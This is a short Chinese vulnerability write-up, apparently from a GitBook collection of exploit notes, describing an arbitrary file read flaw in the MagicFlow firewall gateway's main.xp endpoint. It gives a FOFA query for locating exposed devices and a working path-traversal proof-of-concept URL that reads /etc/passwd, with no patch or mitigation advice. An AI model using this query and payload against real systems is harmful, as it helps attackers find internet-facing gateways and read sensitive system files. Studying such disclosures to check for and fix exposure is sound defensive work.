# MagicFlow 防火墙网关 main.xp 任意文件读取漏洞

### 漏洞描述 <a href="#lou-dong-miao-shu" id="lou-dong-miao-shu"></a>

MagicFlow 防火墙网关 main.xp 存在任意文件读取漏洞，攻击者通过构造特定的Url获取敏感文件

### 漏洞影响 <a href="#lou-dong-ying-xiang" id="lou-dong-ying-xiang"></a>

&#x20;Note

MagicFlow 防火墙网关

### FOFA <a href="#fofa" id="fofa"></a>

&#x20;Note

app="MSA/1.0"

### 漏洞复现 <a href="#lou-dong-fu-xian" id="lou-dong-fu-xian"></a>

登录页面如下

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhr29TNgN3F9wtPQQQU%2F-Mhr4Jgu8Oh-sd4it_T5%2Fimage.png?alt=media\&token=342bea21-42b6-43a1-952a-f867df3f502b)

构造POC

```
/msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=msagroup.txt+downLoadFile=../etc/passwd
```

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhr29TNgN3F9wtPQQQU%2F-Mhr4Mh7Xvz4rlANuFop%2Fimage.png?alt=media\&token=5a6de938-981d-4541-9f36-f4937c09f310)